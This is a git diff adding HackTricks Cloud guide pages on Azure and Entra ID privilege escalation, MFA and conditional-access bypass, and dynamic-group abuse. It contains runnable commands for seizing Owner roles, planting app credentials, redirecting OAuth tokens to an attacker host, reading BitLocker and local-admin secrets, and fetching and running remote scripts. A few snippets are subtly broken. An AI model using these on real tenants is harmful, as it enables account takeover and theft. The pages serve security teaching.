+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/README.md b/pentesting-cloud/azure-security/az-privilege-escalation/README.md new file mode 100644 index 0000000000..1aa36a8cfd --- /dev/null +++ b/pentesting-cloud/azure-security/az-privilege-escalation/README.md @@ -0,0 +1,2 @@ +# Az - Privilege Escalation + diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md new file mode 100644 index 0000000000..8a6e79d19e --- /dev/null +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md @@ -0,0 +1,99 @@ +# Az - Azure IAM Privesc (Authorization) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Azure IAM + +Fore more information check: + +{% content-ref url="../az-services/az-azuread.md" %} +[az-azuread.md](../az-services/az-azuread.md) +{% endcontent-ref %} + +### Microsoft.Authorization/roleAssignments/write + +This permission allows to assign roles to principals over a specific scope, allowing an attacker to escalate privileges by assigning himself a more privileged role: + +{% code overflow="wrap" %} +```bash +# Example +az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234" +``` +{% endcode %} + +### Microsoft.Authorization/roleDefinitions/Write + +This permission allows to modify the permissions granted by a role, allowing an attacker to escalate privileges by granting more permissions to a role he has assigned. + +Create the file `role.json` with the following **content**: + +```json +{ + "Name": "", + "IsCustom": true, + "Description": "Custom role with elevated privileges", + "Actions": [ + "*" + ], + "NotActions": [], + "DataActions": [ + "*" + ], + "NotDataActions": [], + "AssignableScopes": [ + "/subscriptions/" + ] +} +``` + +Then update the role permissions with the previous definition calling: + +```bash +az role definition update --role-definition role.json +``` + +### Microsoft.Authorization/elevateAccess/action + +This permissions allows to elevate privileges and be able to assign permissions to any principal to Azure resources. It's meant to be given to Entra ID Global Administrators so they can also manage permissions over Azure resources. + +{% hint style="success" %} +I think the user need to be Global Administrator in Entrad ID for the elevate call to work. 
+{% endhint %} + +{% code overflow="wrap" %} +```bash +# Call elevate +az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01" + +# Grant a user the Owner role +az role assignment create --assignee "" --role "Owner" --scope "/" +``` +{% endcode %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md new file mode 100644 index 0000000000..533dd93bce --- /dev/null +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md @@ -0,0 +1,398 @@ +# Az - EntraID Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +{% hint style="info" %} +Note that **not all the granular permissions** built-in roles have in Entra ID **are elegible to be used in custom roles.** +{% endhint %} + +## Roles + +### Role: Privileged Role Administrator + +This role contains the necessary granular permissions to be able to assign roles to principals and to give more permissions to roles. Both actions could be abused to escalate privileges. + +* Assign role to a user: + +```bash +# List enabled built-in roles +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/directoryRoles" + +# Give role (Global Administrator?) to a user +roleId="" +userId="" +az rest --method POST \ + --uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \ + --headers "Content-Type=application/json" \ + --body "{ + \"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\" + }" +``` + +* Add more permissions to a role: + +```bash +# List only custom roles +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)' + +# Change the permissions of a custom role +az rest --method PATCH \ + --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/" \ + --headers "Content-Type=application/json" \ + --body '{ + "description": "Update basic properties of application registrations", + "rolePermissions": [ + { + "allowedResourceActions": [ + "microsoft.directory/applications/credentials/update" + ] + } + ] + }' +``` + +## Applications + +### `microsoft.directory/applications/credentials/update` + +This allows an attacker to **add credentials** (passwords or certificates) to existing applications. If the application has privileged permissions, the attacker can authenticate as that application and gain those privileges. 
+ +```bash +# Generate a new password without overwritting old ones +az ad app credential reset --id --append +# Generate a new certificate without overwritting old ones +az ad app credential reset --id --create-cert +``` + +### `microsoft.directory/applications.myOrganization/credentials/update` + +This allows the same actions as `applications/credentials/update`, but scoped to single-directory applications. + +```bash +az ad app credential reset --id --append +``` + +### `microsoft.directory/applications/owners/update` + +By adding themselves as an owner, an attacker can manipulate the application, including credentials and permissions. + +```bash +az ad app owner add --id --owner-object-id +az ad app credential reset --id --append + +# You can check the owners with +az ad app owner list --id +``` + +### `microsoft.directory/applications/allProperties/update` + +An attacker can add a redirect URI to applications that are being used by users of the tenant and then share with them login URLs that use the new redirect URL in order to steal their tokens. Note that if the user was already logged in the application, the authentication is going to be automatic without the user needing to accept anything. + +Note that it's also possible to change the permissions the application requests in order to get more permissions, but in this case the user will need accept again the prompt asking for all the permissions. + +{% code overflow="wrap" %} +```bash +# Get current redirect uris +az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris" +# Add a new redirect URI (make sure to keep the configured ones) +az ad app update --id --web-redirect-uris "https://original.com/callback https://attack.com/callback" +``` +{% endcode %} + +## Service Principals + +### `microsoft.directory/servicePrincipals/credentials/update` + +This allows an attacker to add credentials to existing service principals. 
If the service principal has elevated privileges, the attacker can assume those privileges. + +```bash +az ad sp credential reset --id --append +``` + +{% hint style="danger" %} +The new generated password won't appear in the web console, so this could be a stealth way to maintain persistence over a service principal.\ +From the API they can be found with: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json` +{% endhint %} + +If you get the error `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` it's because **it's not possible to modify the passwordCredentials property** of the SP and first you need to unlock it. For it you need a permission (`microsoft.directory/applications/allProperties/update`) that allows you to execute: + +{% code overflow="wrap" %} +```bash +az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/ --body '{"servicePrincipalLockConfiguration": null}' +``` +{% endcode %} + +### `microsoft.directory/servicePrincipals/synchronizationCredentials/manage` + +This allows an attacker to add credentials to existing service principals. If the service principal has elevated privileges, the attacker can assume those privileges. + +```bash +az ad sp credential reset --id --append +``` + +### `microsoft.directory/servicePrincipals/owners/update` + +Similar to applications, this permission allows to add more owners to a service principal. Owning a service principal allows control over its credentials and permissions. 
+ +```bash +# Add new owner +spId="" +userId="" +az rest --method POST \ + --uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \ + --headers "Content-Type=application/json" \ + --body "{ + \"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\" + }" + +az ad sp credential reset --id --append + +# You can check the owners with +az ad sp owner list --id +``` + +{% hint style="danger" %} +After adding a new owner, I tried to remove it but the API responded that the DELETE method wasn't supported, even if it's the method you need to use to delete the owner. So you **can't remove owners nowadays**. +{% endhint %} + +### `microsoft.directory/servicePrincipals/disable` and `enable` + +These permissions allows to disable and enable service principals. An attacker could use this permission to enable a service principal he could get access to somehow to escalate privileges. + +Note that for this technique the attacker will need more permissions in order to take over the enabled service principal. + +```bash +bashCopy code# Disable +az ad sp update --id --account-enabled false + +# Enable +az ad sp update --id --account-enabled true +``` + +#### `microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials` & `microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials` + +These permissions allow to create and get credentials for single sign-on which could allow access to third-party applications. 
+ +{% code overflow="wrap" %} +```bash +# Generate SSO creds for a user or a group +spID="" +user_or_group_id="" +username="" +password="" +az rest --method POST \ + --uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \ + --headers "Content-Type=application/json" \ + --body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}" + + +# Get credentials of a specific credID +credID="" +az rest --method POST \ + --uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \ + --headers "Content-Type=application/json" \ + --body "{\"id\": \"$credID\"}" +``` +{% endcode %} + +*** + +## Groups + +### `microsoft.directory/groups/allProperties/update` + +This permission allows to add users to privileged groups, leading to privilege escalation. + +```bash +az ad group member add --group --member-id +``` + +**Note**: This permission excludes Entra ID role-assignable groups. + +### `microsoft.directory/groups/owners/update` + +This permission allows to become an owner of groups. An owner of a group can control group membership and settings, potentially escalating privileges to the group. + +```bash +az ad group owner add --group --owner-object-id +az ad group member add --group --member-id +``` + +**Note**: This permission excludes Entra ID role-assignable groups. + +### `microsoft.directory/groups/members/update` + +This permission allows to add members to a group. An attacker could add himself or malicious accounts to privileged groups can grant elevated access. + +```bash +az ad group member add --group --member-id +``` + +### `microsoft.directory/groups/dynamicMembershipRule/update` + +This permission allows to update membership rule in a dynamic group. 
An attacker could modify dynamic rules to include himself in privileged groups without explicit addition. + +```bash +groupId="" +az rest --method PATCH \ + --uri "https://graph.microsoft.com/v1.0/groups/$groupId" \ + --headers "Content-Type=application/json" \ + --body '{ + "membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")", + "membershipRuleProcessingState": "On" + }' +``` + +**Note**: This permission excludes Entra ID role-assignable groups. + +### Dynamic Groups Privesc + +It might be possible for users to escalate privileges modifying their own properties to be added as members of dynamic groups. For more info check: + +{% content-ref url="dynamic-groups.md" %} +[dynamic-groups.md](dynamic-groups.md) +{% endcontent-ref %} + +## Users + +### `microsoft.directory/users/password/update` + +This permission allows to reset password to non-admin users, allowing a potential attacker to escalate privileges to other users. This permission cannot be assigned to custom roles. + +```bash +az ad user update --id --password "kweoifuh.234" +``` + +### `microsoft.directory/users/basic/update` + +This privilege allows to modify properties of the user. It's common to find dynamic groups that add users based on properties values, therefore, this permission could allow a user to set the needed property value to be a member to a specific dynamic group and escalate privileges. + +{% code overflow="wrap" %} +```bash +#e.g. change manager of a user +victimUser="" +managerUser="" +az rest --method PUT \ + --uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \ + --headers "Content-Type=application/json" \ + --body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}' + +#e.g. 
change department of a user +az rest --method PATCH \ + --uri "https://graph.microsoft.com/v1.0/users/$victimUser" \ + --headers "Content-Type=application/json" \ + --body "{\"department\": \"security\"}" +``` +{% endcode %} + +## Conditional Access Policies & MFA bypass + +Misconfigured conditional access policies requiring MFA could be bypassed, check: + +{% content-ref url="az-conditional-access-policies-mfa-bypass.md" %} +[az-conditional-access-policies-mfa-bypass.md](az-conditional-access-policies-mfa-bypass.md) +{% endcontent-ref %} + +## Devices + +### `microsoft.directory/devices/registeredOwners/update` + +This permission allows attackers to assigning themselves as owners of devices to gain control or access to device-specific settings and data. + +```bash +deviceId="" +userId="" +az rest --method POST \ + --uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \ + --headers "Content-Type=application/json" \ + --body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}' +``` + +### `microsoft.directory/devices/registeredUsers/update` + +This permission allows attackers to associate their account with devices to gain access or to bypass security policies. 
+ +```bash +deviceId="" +userId="" +az rest --method POST \ + --uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \ + --headers "Content-Type=application/json" \ + --body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}' +``` + +### `microsoft.directory/deviceLocalCredentials/password/read` + +This permission allows attackers to read the properties of the backed up local administrator account credentials for Microsoft Entra joined devices, including the password + +{% code overflow="wrap" %} +```bash +# List deviceLocalCredentials +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials" + +# Get credentials +deviceLC="" +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \ +``` +{% endcode %} + +## BitlockerKeys + +### `microsoft.directory/bitlockerKeys/key/read` + +This permission allows to access BitLocker keys, which could allow an attacker to decrypt drives, compromising data confidentiality. 
+ +{% code overflow="wrap" %} +```bash +# List recovery keys +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys" + +# Get key +recoveryKeyId="" +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key" +``` +{% endcode %} + +## Other Interesting permissions (TODO) + +* `microsoft.directory/applications/permissions/update` +* `microsoft.directory/servicePrincipals/permissions/update` +* `microsoft.directory/applications.myOrganization/allProperties/update` +* `microsoft.directory/applications/allProperties/update` +* `microsoft.directory/servicePrincipals/appRoleAssignedTo/update` +* `microsoft.directory/applications/appRoles/update` +* `microsoft.directory/applications.myOrganization/permissions/update` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md new file mode 100644 index 0000000000..c58c50947e --- /dev/null +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md @@ -0,0 +1,213 @@ +# Az - Conditional Access Policies & MFA Bypass + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +Azure Conditional Access policies are rules set up in Microsoft Azure to enforce access controls to Azure services and applications based on certain **conditions**. These policies help organizations secure their resources by applying the right access controls under the right circumstances.\ +Conditional access policies basically **defines** **Who** can access **What** from **Where** and **How**. + +Here are a couple of examples: + +1. **Sign-In Risk Policy**: This policy could be set to require multi-factor authentication (MFA) when a sign-in risk is detected. For example, if a user's login behavior is unusual compared to their regular pattern, such as logging in from a different country, the system can prompt for additional authentication. +2. **Device Compliance Policy**: This policy can restrict access to Azure services only to devices that are compliant with the organization's security standards. For instance, access could be allowed only from devices that have up-to-date antivirus software or are running a certain operating system version. + +## Conditional Acces Policies Bypasses + +It's possible that a conditional access policy is **checking some information that can be easily tampered allowing a bypass of the policy**. And if for example the policy was configuring MFA, the attacker will be able to bypass it. + +When configuring a conditional access policy it's needed to indicate the **users** affected and **target resources** (like all cloud apps). 
+ +It's also needed to configure the **conditions** that will **trigger** the policy: + +* **Network**: Ip, IP ranges and geographical locations + * Can be bypassed using a VPN or Proxy to connect to a country or managing to login from an allowed IP address +* **Microsoft risks**: User risk, Sign-in risk, Insider risk +* **Device platforms**: Any device or select Android, iOS, Windows phone, Windows, macOS, Linux + * If “Any device” is not selected but all the other options are selected it’s possible to bypass it using a random user-agent not related to those platforms +* **Client apps**: Option are “Browser”, “Mobiles apps and desktop clients”, “Exchange ActiveSync clients” and Other clients” + * To bypass login with a not selected option +* **Filter for devices**: It’s possible to generate a rule related the used device +* A**uthentication flows**: Options are “Device code flow” and “Authentication transfer” + * This won’t affect an attacker unless he is trying to abuse any of those protocols in a phishing attempt to access the victims account + +The possible **results** are: Block or Grant access with potential conditions like require MFA, device to be compliant… + +### Device Platforms - Device Condition + +It's possible to set a condition based on the **device platform** (Android, iOS, Windows, macOS...), however, this is based on the **user-agent** so it's easy to bypass. Even **making all the options enforce MFA**, if you use a **user-agent that it isn't recognized,** you will be able to bypass the MFA or block: + +
+ +Just making the browser **send an unknown user-agent** (like `Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) UCBrowser/10.1.0.563 Mobile`) is enough to not trigger this condition.\ +You can change the user agent **manually** in the developer tools: + +
+ + Or use a [browser extension like this one](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en). + +### Locations: Countries, IP ranges - Device Condition + +If this is set in the conditional policy, an attacker could just use a **VPN** in the **allowed country** or try to find a way to access from an **allowed IP address** to bypass these conditions. + +### Cloud Apps + +It's possible to configure **conditional access policies to block or force** for example MFA when a user tries to access **specific app**: + +
+ +To try to bypass this protection you should see if you can **only into any application**.\ +The tool [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) has **tens of application IDs hardcoded** and will try to login into them and let you know and even give you the token if successful. + +In order to **test specific application IDs in specific resources** you could also use a tool such as: + +{% code overflow="wrap" %} +```bash +roadrecon auth -u user@email.com -r https://outlook.office.com/ -c 1fec8e78-bce4-4aaf-ab1b-5451cc387264 --tokens-stdout + + +``` +{% endcode %} + +Moreover, it's also possible to protect the login method (e.g. if you are trying to login from the browser or from a desktop application). The tool [**Invoke-MFASweep**](az-conditional-access-policies-mfa-bypass.md#invoke-mfasweep) perform some checks to try to bypass this protections also. + +The tool [**donkeytoken**](az-conditional-access-policies-mfa-bypass.md#donkeytoken) could also be used to similar purposes although it looks unmantained. + +The tool [**ROPCI**](https://github.com/wunderwuzzi23/ropci) can also be used to test this protections and see if it's possible to bypass MFAs or blocks, but this tool works from a **whitebox** perspective. You first need to download the list of Apps allowed in the tenant and then it will try to login into them. + +## Other Az MFA Bypasses + +### Ring tone + +One Azure MFA option is to **receive a call in the configured phone number** where it will be asked the user to **send the char `#`**. + +{% hint style="danger" %} +As chars are just **tones**, an attacker could **compromise** the **voicemail** message of the phone number, configure as the message the **tone of `#`** and then, when requesting the MFA make sure that the **victims phone is busy** (calling it) so the Azure call gets redirected to the voice mail. 
+{% endhint %} + +### Compliant Devices + +Policies often asks for a compliant device or MFA, so an **attacker could register a compliant device**, get a **PRT** token and **bypass this way the MFA**. + +Start by registering a **compliant device in Intune**, then **get the PRT** with: + +```powershell +$prtKeys = Get-AADIntuneUserPRTKeys - PfxFileName .\.pfx -Credentials $credentials + +$prtToken = New-AADIntUserPRTToken -Settings $prtKeys -GertNonce + +Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken + + +``` + +Find more information about this kind of attack in the following page: + +{% content-ref url="../../az-lateral-movement-cloud-on-prem/pass-the-prt.md" %} +[pass-the-prt.md](../../az-lateral-movement-cloud-on-prem/pass-the-prt.md) +{% endcontent-ref %} + +## Tooling + +### [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) + +This script get some user credentials and check if it can login in some applications. + +This is useful to see if you **aren't required MFA to login in some applications** that you might later abuse to **escalate pvivileges**. + +### [roadrecon](https://github.com/dirkjanm/ROADtools) + +Get all the policies + +```bash +roadrecon plugin policies +``` + +### [Invoke-MFASweep](https://github.com/dafthack/MFASweep) + +MFASweep is a PowerShell script that attempts to **log in to various Microsoft services using a provided set of credentials and will attempt to identify if MFA is enabled**. Depending on how conditional access policies and other multi-factor authentication settings are configured some protocols may end up being left single factor. It also has an additional check for ADFS configurations and can attempt to log in to the on-prem ADFS server if detected. 
+ +```bash +Invoke-Expression (Invoke-WebRequest -Uri "https://raw.githubusercontent.com/dafthack/MFASweep/master/MFASweep.ps1").Content +Invoke-MFASweep -Username -Password +``` + +### [ROPCI](https://github.com/wunderwuzzi23/ropci) + +This tool has helped identify MFA bypasses and then abuse APIs in multiple production AAD tenants, where AAD customers believed they had MFA enforced, but ROPC based authentication succeeded. + +{% hint style="success" %} +You need to have permissions to list all the applications to be able to generate the list of the apps to brute-force. +{% endhint %} + +```bash +./ropci configure +./ropci apps list --all --format json -o apps.json +./ropci apps list --all --format json | jq -r '.value[] | [.displayName,.appId] | @csv' > apps.csv +./ropci auth bulk -i apps.csv -o results.json +``` + +### [donkeytoken](https://github.com/silverhack/donkeytoken) + +Donkey token is a set of functions which aim to help security consultants who need to validate Conditional Access Policies, tests for 2FA-enabled Microsoft portals, etc.. + +
git clone https://github.com/silverhack/donkeytoken.git
+Import-Module '.\donkeytoken' -Force
+
+ +**Test each portal** if it's possible to **login without MFA**: + +```powershell +$username = "conditional-access-app-user@azure.training.hacktricks.xyz" +$password = ConvertTo-SecureString "Poehurgi78633" -AsPlainText -Force +$cred = New-Object System.Management.Automation.PSCredential($username, $password) +Invoke-MFATest -credential $cred -Verbose -Debug -InformationAction Continue +``` + +Because the **Azure** **portal** is **not constrained** it's possible to **gather a token from the portal endpoint to access any service detected** by the previous execution. In this case Sharepoint was identified, and a token to access it is requested: + +{% code overflow="wrap" %} +```powershell +$token = Get-DelegationTokenFromAzurePortal -credential $cred -token_type microsoft.graph -extension_type Microsoft_Intune +Read-JWTtoken -token $token.access_token +``` +{% endcode %} + +Supposing the token has the permission Sites.Read.All (from Sharepoint), even if you cannot access Sharepoint from the web because of MFA, it's possible to use the token to access the files with the generated token: + +```powershell +$data = Get-SharePointFilesFromGraph -authentication $token $data[0].downloadUrl +``` + +## References + +* [https://www.youtube.com/watch?v=yOJ6yB9anZM\&t=296s](https://www.youtube.com/watch?v=yOJ6yB9anZM\&t=296s) +* [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md new file mode 100644 index 0000000000..9b72dba495 --- /dev/null +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md @@ -0,0 +1,78 @@ +# Az - Dynamic Groups Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +**Dynamic groups** are groups that has a set of **rules** configured and all the **users or devices** that match the rules are added to the group. Every time a user or device **attribute** is **changed**, dynamic rules are **rechecked**. And when a **new rule** is **created** all devices and users are **checked**. + +Dynamic groups can have **Azure RBAC roles assigned** to them, but it's **not possible** to add **AzureAD roles** to dynamic groups. + +This feature requires Azure AD premium P1 license. + +## Privesc + +Note that by default any user can invite guests in Azure AD, so, If a dynamic group **rule** gives **permissions** to users based on **attributes** that can be **set** in a new **guest**, it's possible to **create a guest** with this attributes and **escalate privileges**. It's also possible for a guest to manage his own profile and change these attributes. + +Get groups that allow Dynamic membership: **`az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table`** + +### Example + +* **Rule example**: `(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")` +* **Rule description**: Any Guest user with a secondary email with the string 'security' will be added to the group + +For the Guest user email, accept the invitation and check the current settings of **that user** in [https://entra.microsoft.com/#view/Microsoft\_AAD\_IAM/TenantOverview.ReactView](https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView).\ +Unfortunately the page doesn't allow to modify the attribute values so we need to use the API: + +{% code overflow="wrap" %} +```powershell +# Login with the gust user +az login --allow-no-subscriptions + +# Get user object ID +az ad signed-in-user show + +# Update otherMails +az rest --method PATCH \ + --url "https://graph.microsoft.com/v1.0/users/" \ + --headers 'Content-Type=application/json' \ + --body '{"otherMails": 
["newemail@example.com", "anotheremail@example.com"]}' + +# Verify the update +az rest --method GET \ + --url "https://graph.microsoft.com/v1.0/users/" \ + --query "otherMails" +``` +{% endcode %} + +## References + +* [https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/](https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
